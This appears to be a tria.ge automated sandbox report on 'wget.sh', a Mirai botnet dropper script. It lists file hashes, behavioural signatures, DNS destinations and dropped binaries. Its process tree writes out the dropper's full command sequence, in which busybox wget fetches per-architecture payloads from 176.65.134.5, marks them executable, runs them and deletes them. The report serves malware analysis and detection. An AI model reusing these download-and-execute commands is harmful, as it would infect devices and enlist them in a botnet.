Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
151s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240418-en -
resource tags
arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10/03/2025, 22:22
Static task
static1
Behavioral task
behavioral1
Sample
wget.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
wget.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
wget.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
wget.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
wget.sh
-
Size
1KB
-
MD5
fe3891afe068ca6fc86017361dfb753c
-
SHA1
d631b6a4eaa99085df4260727c2c86dc82cf5428
-
SHA256
8dcc3e92c112fb94931bd86055dc51f74a70007c058d1571a4eaec583a0852c0
-
SHA512
810560af118bf04a2723fb177bbdf25682e3cb8b95611e15c8d83576305ea41ba11dec0d42c410fc5b287cb8a31901f9190946e957ac8deb8c0d634a42334951
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (105128) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 870 busybox 778 busybox 874 busybox 878 busybox 882 busybox 749 busybox 754 busybox 759 busybox 765 busybox 794 busybox 809 busybox 865 busybox -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/jklarm 750 wget.sh /tmp/jklarm5 755 wget.sh /tmp/jklarm6 760 wget.sh /tmp/jklarm7 767 wget.sh /tmp/jklm68k 779 wget.sh /tmp/jklmips 795 wget.sh /tmp/jklmpsl 811 wget.sh /tmp/jklppc 866 wget.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog jklmpsl File opened for modification /dev/misc/watchdog jklmpsl -
Renames itself 1 IoCs
pid Process 811 jklmpsl -
Unexpected DNS network traffic destination 20 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 202.61.197.122 Destination IP 202.61.197.122 Destination IP 152.53.15.127 Destination IP 51.158.108.203 Destination IP 194.36.144.87 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 194.36.144.87 Destination IP 152.53.15.127 Destination IP 51.158.108.203 Destination IP 51.158.108.203 Destination IP 202.61.197.122 Destination IP 202.61.197.122 Destination IP 202.61.197.122 -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jklmpsl -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 35 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/855/maps jklmpsl File opened for reading /proc/870/maps jklmpsl File opened for reading /proc/878/maps jklmpsl File opened for reading /proc/879/maps jklmpsl File opened for reading /proc/835/maps jklmpsl File opened for reading /proc/843/maps jklmpsl File opened for reading /proc/853/maps jklmpsl File opened for reading /proc/859/maps jklmpsl File opened for reading /proc/838/maps jklmpsl File opened for reading /proc/841/maps jklmpsl File opened for reading /proc/861/maps jklmpsl File opened for reading /proc/873/maps jklmpsl File opened for reading /proc/839/maps jklmpsl File opened for reading /proc/871/maps jklmpsl File opened for reading /proc/837/maps jklmpsl File opened for reading /proc/866/maps jklmpsl File opened for reading /proc/867/maps jklmpsl File opened for reading /proc/874/maps jklmpsl File opened for reading /proc/862/maps jklmpsl File opened for reading /proc/877/maps jklmpsl File opened for reading /proc/881/maps jklmpsl File opened for reading /proc/833/maps jklmpsl File opened for reading /proc/836/maps jklmpsl File opened for reading /proc/846/maps jklmpsl File opened for reading /proc/852/maps jklmpsl File opened for reading /proc/869/maps jklmpsl File opened for reading /proc/883/maps jklmpsl File opened for reading /proc/845/maps jklmpsl File opened for reading /proc/847/maps jklmpsl File opened for reading /proc/849/maps jklmpsl File opened for reading /proc/850/maps jklmpsl File opened for reading /proc/857/maps jklmpsl File opened for reading /proc/860/maps jklmpsl File opened for reading /proc/876/maps jklmpsl File opened for reading /proc/851/maps jklmpsl -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself exim4 811 jklmpsl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jklmpsl -
description ioc Process File opened for reading /proc/843/cmdline jklmpsl File opened for reading /proc/4/comm jklmpsl File opened for reading /proc/6/comm jklmpsl File opened for reading /proc/20/comm jklmpsl File opened for reading /proc/77/comm jklmpsl File opened for reading /proc/78/comm jklmpsl File opened for reading /proc/718/comm jklmpsl File opened for reading /proc/118/comm jklmpsl File opened for reading /proc/719/comm jklmpsl File opened for reading /proc/839/cmdline jklmpsl File opened for reading /proc/855/cmdline jklmpsl File opened for reading /proc/348/status jklmpsl File opened for reading /proc/13/comm jklmpsl File opened for reading /proc/838/cmdline jklmpsl File opened for reading /proc/12/comm jklmpsl File opened for reading /proc/18/comm jklmpsl File opened for reading /proc/36/comm jklmpsl File opened for reading /proc/71/comm jklmpsl File opened for reading /proc/318/comm jklmpsl File opened for reading /proc/698/status jklmpsl File opened for reading /proc/849/cmdline jklmpsl File opened for reading /proc/879/cmdline jklmpsl File opened for reading /proc/37/comm jklmpsl File opened for reading /proc/871/cmdline jklmpsl File opened for reading /proc/876/cmdline jklmpsl File opened for reading /proc/7/comm jklmpsl File opened for reading /proc/76/comm jklmpsl File opened for reading /proc/853/cmdline jklmpsl File opened for reading /proc/721/status jklmpsl File opened for reading /proc/376/status jklmpsl File opened for reading /proc/862/cmdline jklmpsl File opened for reading /proc/319/comm jklmpsl File opened for reading /proc/712/status jklmpsl File opened for reading /proc/835/cmdline jklmpsl File opened for reading /proc/850/cmdline jklmpsl File opened for reading /proc/73/comm jklmpsl File opened for reading /proc/75/comm jklmpsl File opened for reading /proc/233/comm jklmpsl File opened for reading /proc/664/status jklmpsl File opened for reading /proc/859/cmdline jklmpsl File opened for reading /proc/877/cmdline jklmpsl File opened for reading /proc/11/comm jklmpsl File opened for reading /proc/698/comm jklmpsl File opened for reading /proc/883/cmdline jklmpsl File opened for reading /proc/24/comm jklmpsl File opened for reading /proc/218/comm jklmpsl File opened for reading /proc/376/comm jklmpsl File opened for reading /proc/721/comm jklmpsl File opened for reading /proc/837/cmdline jklmpsl File opened for reading /proc/846/cmdline jklmpsl File opened for reading /proc/866/cmdline jklmpsl File opened for reading /proc/348/comm jklmpsl File opened for reading /proc/662/status jklmpsl File opened for reading /proc/852/cmdline jklmpsl File opened for reading /proc/857/cmdline jklmpsl File opened for reading /proc/16/comm jklmpsl File opened for reading /proc/79/comm jklmpsl File opened for reading /proc/426/comm jklmpsl File opened for reading /proc/712/comm jklmpsl File opened for reading /proc/233/status jklmpsl File opened for reading /proc/21/comm jklmpsl File opened for reading /proc/74/comm jklmpsl File opened for reading /proc/674/comm jklmpsl File opened for reading /proc/811/comm jklmpsl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 795 jklmips 797 busybox 783 busybox -
Writes file to tmp directory 8 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklppc busybox File opened for modification /tmp/jklarm busybox File opened for modification /tmp/jklarm5 busybox File opened for modification /tmp/jklarm6 busybox File opened for modification /tmp/jklarm7 busybox File opened for modification /tmp/jklm68k busybox File opened for modification /tmp/jklmips busybox File opened for modification /tmp/jklmpsl busybox
Processes
-
/tmp/wget.sh/tmp/wget.sh1⤵
- Executes dropped EXE
PID:721 -
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm -O jklarm2⤵
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/jklarm./jklarm telnet2⤵PID:750
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵PID:752
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/jklarm5./jklarm5 telnet2⤵PID:755
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵PID:757
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/jklarm6./jklarm6 telnet2⤵PID:760
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵PID:762
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/jklarm7./jklarm7 telnet2⤵PID:767
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵PID:769
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklm68k -O jklm68k2⤵
- Writes file to tmp directory
PID:770
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/jklm68k./jklm68k telnet2⤵PID:779
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵PID:782
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmips -O jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/jklmips./jklmips telnet2⤵
- System Network Configuration Discovery
PID:795
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
PID:797
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklmpsl -O jklmpsl2⤵
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/jklmpsl./jklmpsl telnet2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:811
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵PID:814
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklppc -O jklppc2⤵
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/jklppc./jklppc telnet2⤵PID:866
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵PID:868
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklsh4 -O jklsh42⤵PID:869
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/jklsh4./jklsh4 telnet2⤵PID:871
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵PID:872
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklspc -O jklspc2⤵PID:873
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/jklspc./jklspc telnet2⤵PID:875
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵PID:876
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklx86 -O jklx862⤵PID:877
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/jklx86./jklx86 telnet2⤵PID:879
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵PID:880
-
-
/bin/busybox/bin/busybox wget http://176.65.134.5/jklarc -O jklarc2⤵PID:881
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/jklarc./jklarc telnet2⤵PID:883
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵PID:884
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵PID:885
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD535c215d8e2b2ea03a8a191fb3723195a
SHA1c38bcfc3d7050edeff1b7dbffd85d07348bb01e9
SHA256c4fd68b20997f3c8a60dbadf177b3309d465f0a8bb0ad9b33b4c70ee74dc3a90
SHA512ea5a9fda95965b6eb55c47eefe2b42a9234d13c8d05556e72e916f98a626a0a835fa7f7828d4051b6056d639b06bec0136afa9ac3157736702b94c0ed9effdf8
-
Filesize
60KB
MD5a04040c769cad786555e183ba8ae0ca0
SHA1a89d6b50a8140dddce29595c64949214e65c84f1
SHA2567568e9e64ac1105cdcae20095154214ee943b2edc6c01e6d4b4eb0b7e06255a3
SHA512e152f552b99683b3bf9b9fee2f7d34027a291e02dd2f912620593e714774cfe07e14aa837cdb2f2a300d35b721dfd67e7012955e24352bdad0ffecb4e61ed162
-
Filesize
69KB
MD59e18604aa4c5bedd6e9ea6690b751880
SHA1c1f32fe93aa650f9920fc5bd659d23621ab034a2
SHA25641342a887d2be09cf0165913b43a5916492e677d20429068d4829a090453ccbb
SHA512cdafb3281bcaa5f5c1af71df8d53c2d022de72a559dfea513b41bc08c7d8fe421839cfdc51b3f93f501bb62d02924e3047208e8bce3a8768af2404f3caa767b0
-
Filesize
82KB
MD5a9675614a267473cb83e195d9074a067
SHA1a4d148cf841fc2b84c8bb3dd322e40f601532875
SHA256fe4e8d464b7849a5483782d0c47e53deaf199e284badad12ed98ca79e47a79d9
SHA5128adcc5df013328218823d3310bcc4f27f6e1e9e51de2e7ecd5521873f5ac6cc2315f9136e1599f1da4114e65eaed23449e78f9ce04062243aa8ec793086b1c28
-
Filesize
60KB
MD5f5fa9a5e6c2a71c86b783b6b5586c3e4
SHA11a7888806663b58f4bee84472dab0b63adfab8ea
SHA256d7ed2bfe303a8e565e6b15e25920d017473b2a7678df3781b6b44840065e2c3d
SHA512e13a443311db4a5b4fc3692be4149f534309e24134baf54f508bf56f509aaff7bfab30c1552540030e23270a689cebd7e2ad48e7989687467ada96915d5ae43a
-
Filesize
78KB
MD5ce4bd94ea8cbc021bf79e11f1f734c25
SHA1f562c88119484f3e92be6e95cb0a435836ca6362
SHA256ef931d8ba4966260112b7ed31a1e0b5cd4423becc0397e8eeaee345de903a1ab
SHA512d0a85bbbf02f85e445856cced0f7942652ca8c2d748f17a25129b5fa2982df148d5b2580d4c7512d579e4e666ec62700233802a145bbeb38715e77f847f26d29
-
Filesize
79KB
MD59f79f159a672411a7e5b01f1ed3deb4a
SHA198584c58a231322ed3e64b96727fe6d935f30aa4
SHA2569cf41e60807702cd85a42ffcabb10f2798193200a381b47f3adbebe65f8360aa
SHA5128486d8dbf427ba9e45b81ae462b64239e7aa33e55603ffa12b8cf7efc80e4b0300e6764fb1c89bc261f910178553b68adc6401fb7de1f6eb36a4f76b5b5b5537
-
Filesize
59KB
MD52d898ada13cb85e3fc710949c44ade47
SHA1db36b96c9531eff756b3d2ee92b632bc4903a179
SHA25600188561e6b9bf60b853e3d752f4131b575a77f48dfdb69f39692e20496f8cdd
SHA512e4952241a4ba8a4a83952c28f6396f575ad304ef212bc1897d2790175dfbab0d2c4f1ae2cfca67825ace8eef17c4b4064fde2e31b12ddbe87b6c074f8e9a6b78